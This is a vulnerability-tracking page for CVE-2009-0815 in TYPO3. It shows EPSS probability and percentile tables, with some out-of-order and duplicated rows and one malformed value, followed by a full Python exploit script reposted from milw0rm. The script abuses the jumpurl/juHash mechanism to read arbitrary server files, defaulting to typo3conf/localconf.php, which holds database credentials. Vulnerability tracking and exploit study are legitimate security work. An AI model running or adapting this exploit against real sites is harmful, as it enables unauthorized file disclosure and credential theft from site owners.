CVE-2009-0815 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	67.57%	–	–
2023-03-12	–	–	–	16.2%	–
2023-04-23	–	–	–	19.21%	–
2023-09-03	–	–	–	16.71%	–
2023-10-15	–	–	–	14.86%	–
2024-02-11	–	–	–	18.39%	–
2024-06-02	–	–	–	18.39%	–
2024-09-15	–	–	–	18.43%	–
2024-12-22	–	–	–	16.93%	–
2025-02-09	–	–	–	16.84%	–
2025-03-16	–	–	–	15.15%	–
2025-01-19	–	–	–	16.93%	–
2025-02-16	–	–	–	16.84%	–
2025-03-18	–	–	–	–	49.8%
2025-03-18	–	–	–	–	49.8,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	99%
2023-03-12	95%
2023-04-23	96%
2023-09-03	95%
2023-10-15	95%
2024-02-11	96%
2024-06-02	96%
2024-09-15	96%
2024-12-22	96%
2025-02-09	96%
2025-03-16	96%
2025-01-19	96%
2025-02-16	96%
2025-03-18	98%
2025-03-18	98%

#!/usr/bin/env python # # ------------------------------------------------------------------------------ # TYPO3-SA-2009-002 exploit by Lolek of TK53 <lolek1337 _at_ gmail.com> # date: 2009/02/10 # vendor url: http://typo3.org # vulnerable versions: TYPO3 < 4.2.6, TYPO3 < 4.1.10, TYPO3 < 4.0.12 # usage: # typo3-sa-2009-002.py <host> <file> (defaults to typo3conf/localconf.php) # # if people fixed their installations but did not update the typo3 security key # you should be able to precompute the hashes if you previously got the security key. # # greetings to milw0rm, roflek import urllib,re,sys strip = re.compile(r'.*Calculated juHash, ([a-z0-9]+), did not.*') def useme(): print sys.argv[0], '<host> (with http://) <file> (defaults to typo3conf/localconf.php)' sys.exit(0) def parsehash(host, f): file = urllib.urlencode({'jumpurl' : f, 'type' : 0, 'juSecure': 1, 'locationData' : '1:'}) url = host + '/index.php?' + file try: s = urllib.urlopen(url) r = s.read() except Exception, e: print '[!] - ', str(e) return None tmp = strip.match(r) if tmp: return tmp.group(1) else: return None def content(host, hash, f): file = urllib.urlencode({'jumpurl' : f, 'type' : 0, 'juSecure': 1, 'locationData' : '1:', 'juHash' : hash}) url = host + '/index.php?' + file try: s = urllib.urlopen(url) print '[+] - content of:', f print s.read() except: print '[!] - FAIL' def main(): if len(sys.argv) < 2: useme() if len(sys.argv) < 3: file = 'typo3conf/localconf.php' else: file = sys.argv[2] print '[+] - TYPO3-SA-2009-002 exploit by Lolek of TK53' print '[+] - checking typo3 installation on...' hash = parsehash(sys.argv[1], file) if not hash: print '[!] - version already fixed or 42 went wrong while trying to get the hash' sys.exit(234) content(sys.argv[1], hash, file) if __name__ == '__main__': main() # milw0rm.com [2009-02-10]